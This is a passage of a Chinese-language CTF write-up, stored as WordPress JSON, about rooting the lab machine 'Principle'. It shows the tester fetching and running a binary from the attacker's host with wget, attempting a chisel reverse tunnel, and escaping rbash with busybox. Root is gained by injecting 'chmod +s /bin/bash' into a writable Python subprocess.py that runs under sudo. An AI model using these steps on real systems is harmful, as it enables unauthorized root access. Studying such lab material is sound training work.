talos@principle:\/tmp$ wget http:\/\/192.168.0.143:8888\/ssh\n--2024-04-21 08:47:03--  http:\/\/192.168.0.143:8888\/ssh\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 986144 (963K) [application\/octet-stream]\nSaving to: \u2018ssh\u2019\n\nssh                                   100%[=========================================================================>] 963.03K  --.-KB\/s    in 0.005s  \n\n2024-04-21 08:47:03 (205 MB\/s) - \u2018ssh\u2019 saved [986144\/986144]\n\ntalos@principle:\/tmp$ mv ssh newssh\ntalos@principle:\/tmp$ chmod +x newssh\ntalos@principle:\/tmp$ .\/newssh gehenna@127.0.0.1 -p 3445 -i elohim\nThe authenticity of host '[127.0.0.1]:3445 ([127.0.0.1]:3445)' can't be established.\nED25519 key fingerprint is SHA256:DKEXWHITnUq09\/ftlMqD6Eo+e5eQoeR+HWleDkUB9fw.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '[127.0.0.1]:3445' (ED25519) to the list of known hosts.\ngehenna@127.0.0.1's password: \n\ntalos@principle:\/tmp$ .\/newssh elohim@127.0.0.1 -p 3445 -i elohim\n\nSon, you didn't listen to me, and now you're trapped.\nYou've come a long way, but this is the end of your journey.\n\nelohim@principle:~$ whoami;id\nelohim\nuid=1001(elohim) gid=1001(elohim) groups=1001(elohim),1002(sml)<\/code><\/pre>\n
\u65b9\u6cd5\u4e8c\uff1a\u5185\u7f51\u7a7f\u900f<\/h3>\n
\u4f7f\u7528chisel<\/code>\u8fdb\u884c\u5185\u7f51\u7a7f\u900f\u4e00\u4e0b\uff0c\u4ee3\u7406\u5230\u672c\u5730\u8fdb\u884c\u8fde\u63a5\uff0c\u8fd9\u662fHell\u4e2d\u6d89\u53ca\u5230\u7684\u65b9\u6cd5\uff01<\/p>\n
(remote) talos@principle:\/tmp$ .\/chisel client 192.168.0.143:2345 R:3445:localhost:3445\nSegmentation fault\n(remote) talos@principle:\/tmp$ .\/chisel\nSegmentation fault\n(remote) talos@principle:\/tmp$ cd \/home\/talos\n(remote) talos@principle:\/home\/talos$ ls -la\ntotal 40\ndrwxr-xr-x 4 talos talos 4096 Jul 14  2023 .\ndrwxr-xr-x 4 root  root  4096 Jul  4  2023 ..\n-rw-r--r-- 1 talos talos    1 Jul 14  2023 .bash_history\n-rw-r----- 1 talos talos  261 Jul  5  2023 .bash_logout\n-rw-r----- 1 talos talos 3545 Jul 14  2023 .bashrc\n-rw------- 1 talos talos   20 Jul  4  2023 .lesshst\ndrw-r----- 3 talos talos 4096 Jun 30  2023 .local\n-rw-r----- 1 talos talos  320 Jul 13  2023 note.txt\n-rw-r----- 1 talos talos  807 Jun 30  2023 .profile\ndrwx------ 2 talos talos 4096 Apr 21 08:48 .ssh\n(remote) talos@principle:\/home\/talos$ cp \/tmp\/chisel .\n(remote) talos@principle:\/home\/talos$ chmod +x chisel\n(remote) talos@principle:\/home\/talos$ .\/chisel client 192.168.0.143:2345 R:3445:0.0.0.0:3445\nSegmentation fault<\/code><\/pre>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Principle]\n\u2514\u2500# cp ..\/chisel .                 \n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Principle]\n\u2514\u2500# chmod +x chisel \n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Principle]\n\u2514\u2500# .\/chisel server --reverse -p 2345\n2024\/04\/21 08:54:55 server: Reverse tunnelling enabled\n2024\/04\/21 08:54:55 server: Fingerprint Si58S0\/S2DhbvDVtV6f5tuz7G+DWmm8hbtu578EtVpQ=\n2024\/04\/21 08:54:55 server: Listening on http:\/\/0.0.0.0:2345<\/code><\/pre>\n
\u4e0d\u77e5\u9053\u4e3a\u5565\u53d1\u751f\u4e86\u77ed\u9519\u8bef\uff0c\u4e0d\u7ea0\u7ed3\u4e86\uff0c\u5927\u6982\u5c31\u662f\u8fd9\u6837\u7684\u3002<\/p>\n
\u63d0\u6743<\/h3>\n
\u7ee7\u7eed\u505a\u5427\uff1a<\/p>\n
(remote) talos@principle:\/tmp$ .\/newssh elohim@127.0.0.1 -p 3445 -i elohim\n\nSon, you didn't listen to me, and now you're trapped.\nYou've come a long way, but this is the end of your journey.\n\nelohim@principle:~$ sudo -l\nMatching Defaults entries for elohim on principle:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser elohim may run the following commands on principle:\n    (root) NOPASSWD: \/usr\/bin\/python3 \/opt\/reviewer.py\nelohim@principle:~$ ls -la\ntotal 40\ndrwxr-xr-x 4 elohim elohim 4096 Jul 14  2023 .\ndrwxr-xr-x 4 root   root   4096 Jul  4  2023 ..\n-rw------- 1 elohim elohim  289 Jul 14  2023 .bash_history\n-rw-r----- 1 elohim elohim  261 Jul  5  2023 .bash_logout\n-rw-r----- 1 elohim elohim 3830 Jul 14  2023 .bashrc\n-rw-r----- 1 elohim elohim  777 Jul 13  2023 flag.txt\ndrw-r----- 3 elohim elohim 4096 Jul  2  2023 .local\n-rw-r----- 1 elohim elohim   21 Jul 12  2023 .lock\n-rw-r----- 1 elohim elohim  807 Jul  6  2023 .profile\ndrwx------ 2 elohim elohim 4096 Jul  6  2023 .ssh\nelohim@principle:~$ cat flagbash: \/dev\/null: restricted: cannot redirect output\nbash_completion: _upvars: `-a2': invalid number specifier\nbash: \/dev\/null: restricted: cannot redirect output\nbash_completion: _upvars: `-a0': invalid number specifier\n\nrbash: cat:: No such file or directory\nelohim@principle:~$ cat flag.txt\nrbash: cat:: No such file or directory<\/code><\/pre>\n
\u662f\u4e00\u4e2arbash<\/code>\uff1a<\/p>\n
elohim@principle:~$ ls -l \/opt\/reviewer.py\n-rwxr-xr-x 1 root root 1072 Jul  7  2023 \/opt\/reviewer.py\nelohim@principle:~$ cat \/opt\/reviewer.py\nrbash: cat:: No such file or directory\nelohim@principle:~$ busybox\nBusyBox v1.35.0 (Debian 1:1.35.0-4+b3) multi-call binary.\nBusyBox is copyrighted by many authors between 1998-2015.\nLicensed under GPLv2. See source distribution for detailed\ncopyright notices.\n\nUsage: busybox [function [arguments]...]\n   or: busybox --list[-full]\n   or: busybox --show SCRIPT\n   or: busybox --install [-s] [DIR]\n   or: function [arguments]...\n\n        BusyBox is a multi-call binary that combines many common Unix\n        utilities into a single executable.  Most people will create a\n        link to busybox for each function they wish to use and BusyBox\n        will act like whatever it was invoked as.\n\nCurrently defined functions:\n        [, [[, acpid, adjtimex, ar, arch, arp, arping, ascii, ash, awk, base64, basename, bc, blkdiscard, blkid, blockdev, brctl, bunzip2, bzcat,\n        bzip2, cal, cat, chgrp, chmod, chown, chroot, chvt, clear, cmp, cp, cpio, crc32, cttyhack, cut, date, dc, dd, deallocvt, depmod, devmem, df,\n        diff, dirname, dmesg, dnsdomainname, dos2unix, du, dumpkmap, dumpleases, echo, egrep, env, expand, expr, factor, fallocate, false, fatattr,\n        fdisk, fgrep, find, findfs, fold, free, freeramdisk, fsfreeze, fstrim, ftpget, ftpput, getopt, getty, grep, groups, gunzip, gzip, halt, head,\n        hexdump, hostid, hostname, httpd, hwclock, i2cdetect, i2cdump, i2cget, i2cset, i2ctransfer, id, ifconfig, ifdown, ifup, init, insmod, ionice,\n        ip, ipcalc, ipneigh, kill, killall, klogd, last, less, link, linux32, linux64, linuxrc, ln, loadfont, loadkmap, logger, login, logname,\n        logread, losetup, ls, lsmod, lsscsi, lzcat, lzma, lzop, md5sum, mdev, microcom, mim, mkdir, mkdosfs, mke2fs, mkfifo, mknod, mkpasswd, mkswap,\n        mktemp, modinfo, modprobe, more, mount, mt, mv, nameif, nc, netstat, nl, nologin, nproc, nsenter, nslookup, nuke, od, openvt, partprobe, paste,\n        patch, pidof, ping, ping6, pivot_root, poweroff, printf, ps, pwd, rdate, readlink, realpath, reboot, renice, reset, resume, rev, rm, rmdir,\n        rmmod, route, rpm, rpm2cpio, run-init, run-parts, sed, seq, setkeycodes, setpriv, setsid, sh, sha1sum, sha256sum, sha3sum, sha512sum, shred,\n        shuf, sleep, sort, ssl_client, start-stop-daemon, stat, strings, stty, svc, svok, swapoff, swapon, switch_root, sync, sysctl, syslogd, tac,\n        tail, tar, taskset, tee, telnet, test, tftp, time, timeout, top, touch, tr, traceroute, traceroute6, true, truncate, ts, tty, ubirename,\n        udhcpc, udhcpd, uevent, umount, uname, uncompress, unexpand, uniq, unix2dos, unlink, unlzma, unshare, unxz, unzip, uptime, usleep, uudecode,\n        uuencode, vconfig, vi, w, watch, watchdog, wc, wget, which, who, whoami, xargs, xxd, xz, xzcat, yes, zcat\nelohim@principle:~$ busybox cat flag.txt\n                           _\n                          _)\\.-.\n         .-.__,___,_.-=-. )\\`  a`\\_\n     .-.__\\__,__,__.-=-. `\/  \\     `\\\n     {~,-~-,-~.-~,-,;;;;\\ |   '--;`)\/\n      \\-,~_-~_-,~-,(_(_(;\\\/   ,;\/\n       ",-.~_,-~,-~,)_)_)'.  ;;(\n         `~-,_-~,-~(_(_(_(_\\  `;\\\n   ,          `"~~--,)_)_)_)\\_   \\\n   |\\              (_(_\/_(_,   \\  ;\n   \\ '-.       _.--'  \/_\/_\/_)   | |\n    '--.\\    .'          \/_\/    | |\n        ))  \/       \\      |   \/.'\n       \/\/  \/,        | __.'|  ||\n      \/\/   ||        \/`    (  ||\n     ||    ||      .'       \\ \\\\\n     ||    ||    .'_         \\ \\\\\n      \\\\   \/\/   \/ _ `\\        \\ \\\\__\n       \\'-'\/(   _  `\\,;        \\ '--:,\n        `"`  `"` `-,,;         `"`",,;\n\nCONGRATULATIONS, you have defeated me!\n\nThe flag is:\nK|tW4bw7$zNh'PwSh\/jN\n\nBroadcast message from root@principle (somewhere) (Sun Apr 21 09:05:01 2024):  \n\nI have detected an intruder, stealing accounts: elohim\n\n^C\nelohim@principle:~$ busybox cat \/opt\/reviewer.py\n#!\/usr\/bin\/python3\n\nimport os\nimport subprocess\n\ndef eliminar_archivos_incorrectos(directorio):\n    extensiones_validas = ['.jpg', '.png', '.gif']\n\n    for nombre_archivo in os.listdir(directorio):\n        archivo = os.path.join(directorio, nombre_archivo)\n\n        if os.path.isfile(archivo):\n            _, extension = os.path.splitext(archivo)\n\n            if extension.lower() not in extensiones_validas:\n                os.remove(archivo)\n                print(f"Archivo eliminado: {archivo}")\n\ndirectorio = '\/var\/www\/hellfire.t4l0s.hmv\/archivos'\n\neliminar_archivos_incorrectos(directorio)\n\ndef enviar_mensaje_usuarios_conectados():\n    proceso = subprocess.Popen(['who'], stdout=subprocess.PIPE)\n    salida, _ = proceso.communicate()\n    lista_usuarios = salida.decode().strip().split('\\n')\n    usuarios_conectados = [usuario.split()[0] for usuario in lista_usuarios]\n    mensaje = f"I have detected an intruder, stealing accounts: {', '.join(usuarios_conectados)}"\n    subprocess.run(['wall', mensaje])\n\nenviar_mensaje_usuarios_conectados()<\/code><\/pre>\n
\u597d\u590d\u6742\uff0c\u770b\u4e00\u4e0b\u4ed6\u7528\u7684\u4e24\u4e2a\u53e3\u5e93\uff1a<\/p>\n
elohim@principle:~$ python3 -V\nPython 3.11.2\nelohim@principle:~$ ls -al \/usr\/lib\/python3.11\/os.py\n-rw-r--r-- 1 root root 39504 Mar 13  2023 \/usr\/lib\/python3.11\/os.py\nelohim@principle:~$ ls -al \/usr\/lib\/python3.11\/subprocess.py\n-rw-rw-r-- 1 root sml 85745 Jul 11  2023 \/usr\/lib\/python3.11\/subprocess.py\nelohim@principle:~$ id\nuid=1001(elohim) gid=1001(elohim) groups=1001(elohim),1002(sml)<\/code><\/pre>\n
\u6b63\u597d\u6211\u4eec\u53ef\u4ee5\u4fee\u6539\u5176\u4e2d\u4e00\u4e2a\uff01\uff01<\/p>\n
echo 'import os; os.system("chmod +s \/bin\/bash")' >> \/usr\/lib\/python3.11\/subprocess.py<\/code><\/pre>\n
\u7136\u540e\u62ff\u4e0bflag\uff01\uff01\uff01<\/p>\n
elohim@principle:~$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1265648 Apr 23  2023 \/bin\/bash                                               echo 'import os; os.system("chmod +s \/bin\/bash")' >> \/usr\/lib\/python3.11\/subprocess.pys; os.system("chmod +s \/bin\/bash")' >> \/usr\/lib\/python3.11\/subprocess.py\nelohim@principle:~$ sudo python3 \/opt\/reviewer.py\n\nBroadcast message from root@principle (pts\/3) (Sun Apr 21 09:11:20 2024):      \n\nI have detected an intruder, stealing accounts: elohim, elohim\n\nBroadcast message from root@principle (pts\/3) (Sun Apr 21 09:11:20 2024):      \n\nI have detected an intruder, stealing accounts: elohim, elohim\n\nelohim@principle:~$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1265648 Apr 23  2023 \/bin\/bash\nelohim@principle:~$ \/bin\/bash -p\nbash-5.2# whoami;id\nroot\nuid=1001(elohim) gid=1001(elohim) euid=0(root) egid=0(root) groups=0(root),1001(elohim),1002(sml)\nbash-5.2# cd \/root\nbash-5.2# ls -la\ntotal 40\ndrwx------  5 root root 4096 Jul 14  2023 .\ndrwxr-xr-x 18 root root 4096 Jul 11  2023 ..\n-rw-------  1 root root    0 Jul 14  2023 .bash_history\n-rw-r--r--  1 root root  597 Jul  7  2023 .bashrc\ndrwx------  3 root root 4096 Jul  3  2023 .config\n-rw-------  1 root root   20 Jul  6  2023 .lesshst\ndrwxr-xr-x  3 root root 4096 Jun 30  2023 .local\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-r-----  1 root root  478 Jul  7  2023 root.txt\n-rw-r--r--  1 root root   66 Jul  6  2023 .selected_editor\ndrwx------  2 root root 4096 Jul 13  2023 .ssh\nbash-5.2# cat root.txt \nCONGRATULATIONS, the system has been pwned!\n\n          _______\n        @@@@@@@@@@@\n      @@@@@@@@@@@@@@@\n     @@@@@@@222@@@@@@@\n    (@@@@@\/_____\\@@@@@)\n     @@@@(_______)@@@@\n      @@@{ " L " }@@@\n       \\@  \\ - \/  @\/\n        \/    ~    \\\n      \/ ==        == \\\n    <      \\ __ \/      >\n   \/ \\          |    \/  \\\n \/    \\       ==+==       \\\n|      \\     ___|_         |\n| \\\/\/~~~|---\/ * ~~~~  |     }\n{  \/|   |-----\/~~~~|  |    \/\n \\_ |  \/           |__|_ \/\n\n+wP"y8z3TcDqO!&a*rg\/<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
Principle \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 192.168.0.101 — -A Ope […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-602","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/602","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=602"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/602\/revisions"}],"predecessor-version":[{"id":603,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/602\/revisions\/603"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=602"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=602"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=602"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}